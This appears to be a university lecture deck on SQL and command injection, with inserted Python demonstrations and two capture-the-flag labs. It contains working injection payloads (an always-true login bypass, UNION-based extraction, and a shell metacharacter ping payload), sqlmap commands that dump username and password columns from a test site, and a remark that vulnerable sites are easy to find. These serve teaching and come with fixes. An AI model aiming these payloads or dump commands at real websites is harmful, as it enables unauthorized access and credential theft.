Topic 2 SQLi Code Injection For Students

This document discusses SQL and code injections. It provides an overview of SQL injection attacks, how they work by exploiting vulnerabilities in web applications. It also discusses how SQLmap can be used to scan for and exploit SQL injection vulnerabilities. It then covers a lab on a small data leak vulnerability and how SQLmap was used to extract data. Finally, it discusses another lab on a ping command injection vulnerability and how to read files on the system.


SQL and Code Injections

Giorgi Akhalaia

Tbilisi, 2023
Overview

• Intro to Web Security

• Injection Methods

• Relevance of SQL Injection Today

• Work with SQLmap

• Lab: small-data-leak

• Command Injections

• Lab: ping-station
SQL Injection

• A SQL injection attack exploits a web application that builds database queries out of untrusted input. Attacks are usually classified by how the results come back: in-band (error-based and union-based), blind or inferential (boolean-based and time-based), and out-of-band.

• SQL injection usually occurs when you ask a user for input, like their username/userid, and instead of a name/id the user gives you an SQL statement that you will unknowingly run on your database.

• If the attacker can dynamically change SQL statements and execute them on the backend, then the attacker can compromise the confidentiality, integrity, and availability of information stored in the database.

(Screenshot in the original: a login form submitted with the username Koba and an injected or '=' clause in the password field.) The original query said, "Please compare the username given to the password in its associated field. If this username matches this password, allow access." What we injected changed the original query to say, "You can compare whatever you'd like, but '=' is a true statement, so allow access please."

For testing: http://testphp.vulnweb.com/
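The login bypass described above, written out as an added example (this is not code from the slides; the in-memory SQLite database, the user Koba/s3cret and the function names are constructed for the demonstration). The vulnerable version concatenates the username and password into the SQL text, so the classic payload `' OR ''='` closes the password string and appends a comparison that is always true; the safe version binds the same input as parameters and the payload is simply a wrong password:

```python
import sqlite3

# Constructed demo database: one user, as the slide's login example assumes.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uname TEXT, pass TEXT)")
    conn.execute("INSERT INTO users VALUES ('Koba', 's3cret')")
    return conn

def render_login_query(uname, pw):
    # The bug: user input is concatenated straight into the SQL text,
    # so a quote in the input ends the string literal early.
    return ("SELECT uname FROM users WHERE uname = '" + uname +
            "' AND pass = '" + pw + "'")

def login_vulnerable(conn, uname, pw):
    return conn.execute(render_login_query(uname, pw)).fetchone() is not None

def login_safe(conn, uname, pw):
    # Parameterized query: the driver binds the values as data, so a quote
    # in the password is compared literally and never parsed as SQL.
    sql = "SELECT uname FROM users WHERE uname = ? AND pass = ?"
    return conn.execute(sql, (uname, pw)).fetchone() is not None

def demo():
    conn = make_db()
    # The slide's trick: close the string, then add a comparison that is
    # always true. AND binds tighter than OR, so the WHERE clause becomes
    # (uname = 'Koba' AND pass = '') OR '' = ''  ->  always true.
    payload = "' OR ''='"
    return {
        "query_seen_by_db": render_login_query("Koba", payload),
        "vuln_correct_password": login_vulnerable(conn, "Koba", "s3cret"),
        "vuln_injected": login_vulnerable(conn, "Koba", payload),
        # The username does not even have to exist for the bypass to work.
        "vuln_injected_unknown_user": login_vulnerable(conn, "nobody", payload),
        "safe_correct_password": login_safe(conn, "Koba", "s3cret"),
        "safe_injected": login_safe(conn, "Koba", payload),
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

The query the database actually receives is `SELECT uname FROM users WHERE uname = 'Koba' AND pass = '' OR ''=''`, which is exactly the "compare whatever you like, but '' = '' is true" reading the slide describes. Quoting or escaping input by hand is not a substitute for parameter binding; the `?` placeholders are the fix.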


SQL injections today

SQL injections are still valid today. Simply searching for parameters to attack (for example the search term php?id=) can give us tons of vulnerable websites.

For the test site testphp.vulnweb.com the front page has no parameters in the URL, so we need to try another way of testing its security. Very commonly, security problems are found around the inputs (login, register, search form etc.). Using special tools we can scan vulnerable URLs.

Once we perform a search, the parameters appear in the URL:

http://testphp.vulnweb.com/search.php?test=query

In this case we can use sqlmap to get the information from the vulnerable URL.
Getting databases

To check the URL we run sqlmap with -u (the URL to test) and --dbs (what we are looking for: the database names). Quote the URL in the shell if it contains & or other metacharacters.

$ sqlmap -u http://testphp.vulnweb.com/search.php?test=query --dbs

Two databases were found.

Getting the tables

Now we know the name of the database (-D acuart) and can list the tables inside it (--tables):

$ sqlmap -u http://testphp.vulnweb.com/search.php?test=query -D acuart --tables

Getting the columns

When we know the name of the table (-T users), we can list its columns (--columns):

$ sqlmap -u http://testphp.vulnweb.com/search.php?test=query -D acuart -T users --columns

The columns of interest are the username and password.

Getting information

Finally we ask for the chosen columns (-C uname,pass) and dump their contents (--dump):

$ sqlmap -u http://testphp.vulnweb.com/search.php?test=query -D acuart -T users -C uname,pass --dump

Results: (screenshot in the original)
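What sqlmap automates in the four commands above (and in the small-data-leak lab later on) is the same loop done by hand: find an injectable parameter, pick a technique, then read the database's own metadata to get tables, columns and finally rows. The following added example (not code from the slides or from sqlmap) does that manually with a UNION-based injection against a constructed in-memory SQLite stand-in for the search.php?test= endpoint. The table names, the "LEAK" marker column and the function names are assumptions for the demo; on MySQL the metadata lives in information_schema.tables and information_schema.columns instead of sqlite_master:

```python
import sqlite3

# Constructed stand-in for the "acuart" database: a searchable table plus
# a users table with credentials, as on the slides.
def make_shop_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE artists (aname TEXT, adesc TEXT)")
    conn.execute("CREATE TABLE users (uname TEXT, pass TEXT)")
    conn.executemany("INSERT INTO artists VALUES (?, ?)",
                     [("r4w8173", "street art"), ("Blad3", "graffiti")])
    conn.execute("INSERT INTO users VALUES ('test', 'test')")
    return conn

def search_vulnerable(conn, test):
    # Mirrors search.php?test=<query>: the parameter is spliced into the SQL.
    sql = "SELECT aname, adesc FROM artists WHERE adesc LIKE '%" + test + "%'"
    return conn.execute(sql).fetchall()

def leak(conn, select_expr, from_where):
    # UNION-based extraction: close the LIKE string with a value that matches
    # nothing, append our own SELECT with the same column count (2), and comment
    # out the trailing %' that the application appends.
    test = ("nomatch' UNION SELECT " + select_expr + ", 'LEAK' "
            + from_where + " -- ")
    rows = search_vulnerable(conn, test)
    # Only rows tagged with our marker come from the injected SELECT.
    return [row[0] for row in rows if row[1] == "LEAK"]

def enumerate_like_sqlmap(conn):
    # --tables: table names from the catalog
    tables = leak(conn, "name", "FROM sqlite_master WHERE type='table'")
    # --columns: the CREATE statement reveals the column names
    schema = leak(conn, "sql", "FROM sqlite_master WHERE name='users'")
    # -C uname,pass --dump: the rows themselves
    creds = leak(conn, "uname || ':' || pass", "FROM users")
    return {"tables": sorted(tables), "users_schema": schema, "creds": creds}

if __name__ == "__main__":
    conn = make_shop_db()
    for step, found in enumerate_like_sqlmap(conn).items():
        print(step, "->", found)
```

Each step only works because the application reflects query results back in the page (in-band). When it does not, sqlmap falls back to boolean-based or time-based blind techniques, which recover the same data one bit at a time; that is why those runs are much slower.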
SQL Injection
(Structured Query Language)

Potential outcomes

• Identity spoofing through manipulating databases to insert bogus or misleading information

• Alteration of prices in e-commerce applications

• Alteration of data or outright replacement of data in existing databases with information created by the attacker

• Escalation of privileges to increase the level of access an attacker has to the system

• Denial of service, performed by flooding the server with requests designed to overwhelm the system

• Data extraction and disclosure of all data on the system through the manipulation of the database

• Destruction or corruption of data through rewriting, altering, or other means

• Eliminating or altering transactions that have been or will be committed
Laboratory: small-data-leak

Description:
I do not know what is wrong /user?id=.
It's not working at all. All I know is that
an attacker is asking us for a ransom...

Flag format: CTF{sha256}

Level: Medium

Server: 35.246.158.241:32442

Hints:
• Hint 1: sqlmap is your friend
Laboratory: small-data-leak

Try the hint from the description: request /user?id= and look at the error page.

Based on the error above, we concluded that the back end uses SQLAlchemy, a Python library for interacting with SQL databases.

Since the SQL vulnerability seems pretty basic, we will use sqlmap to find the injection point.

Commands (the blanks are left for you to fill in):

$ sqlmap -u http://35.246.158.241:31089/??????? --dbs

$ sqlmap -u http://35.246.158.241:31089/??????? -D ???????????

$ ???????????????????
Laboratory: ping-station

Description:
Just another ping service to audit.

Flag format: ECSC {sha256}

Level: Easy

Server: 35.246.134.224:31532

Hints:
• Hint 1: Regex
• Hint 2: Command injection
Laboratory: ping-station

Trying only a command (no host) gives an error. (Screenshot in the original.)

Try yourself ... Result: (screenshot in the original)

Try to read the content of ???????????? Result: (screenshot in the original)
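The two hints (Regex, Command injection) describe the usual shape of a ping service bug: the host is validated with a regular expression and then pasted into a shell command line. The following added example is not the lab's code (its real filter is not shown on the slides); it assumes a start-anchored re.match() validator as the weak filter, uses echo in place of ping so it runs offline and without root, and contrasts it with a fully anchored validator and an argv list without a shell. The payload `127.0.0.1; echo INJECTED` stands in for what you would actually inject to read a file, such as `; cat <file>`:

```python
import re
import subprocess

# Assumed weak validator: re.match() only anchors at the start of the string,
# so anything after a valid-looking address is never inspected.
IPV4 = re.compile(r"\d{1,3}(\.\d{1,3}){3}")

def weak_filter_accepts(host):
    return IPV4.match(host) is not None

def strict_filter_accepts(host):
    # fullmatch anchors both ends, so "; cat /etc/passwd", "$(id)" or a
    # newline after the address is rejected; the octets are range-checked too.
    if IPV4.fullmatch(host) is None:
        return False
    return all(int(octet) <= 255 for octet in host.split("."))

def ping_vulnerable(host, cmd="echo"):
    # The bug: the host is concatenated into a command line that /bin/sh parses.
    # `echo` stands in for `ping -c 1` so the demo runs anywhere.
    if not weak_filter_accepts(host):
        raise ValueError("bad host")
    line = cmd + " " + host
    return subprocess.run(line, shell=True, capture_output=True, text=True).stdout

def ping_hardened(host, cmd="echo"):
    if not strict_filter_accepts(host):
        raise ValueError("bad host")
    # argv list and no shell: the host is exactly one argument, so ; | $( ) are inert.
    return subprocess.run([cmd, host], capture_output=True, text=True).stdout

def demo():
    payload = "127.0.0.1; echo INJECTED"
    result = {
        "weak_accepts_payload": weak_filter_accepts(payload),
        "strict_accepts_payload": strict_filter_accepts(payload),
        "vulnerable_output": ping_vulnerable(payload),
        "hardened_output_clean": ping_hardened("127.0.0.1"),
    }
    try:
        ping_hardened(payload)
        result["hardened_blocked_payload"] = False
    except ValueError:
        result["hardened_blocked_payload"] = True
    return result

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", repr(value))
```

Both fixes matter: the anchored regex stops the obvious payloads, and dropping the shell means that even a validator mistake (a hostname pattern that allows more characters, for instance) cannot turn into code execution.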
Thank you for your attention!

Contact: email: [email protected]

mob: 598 590158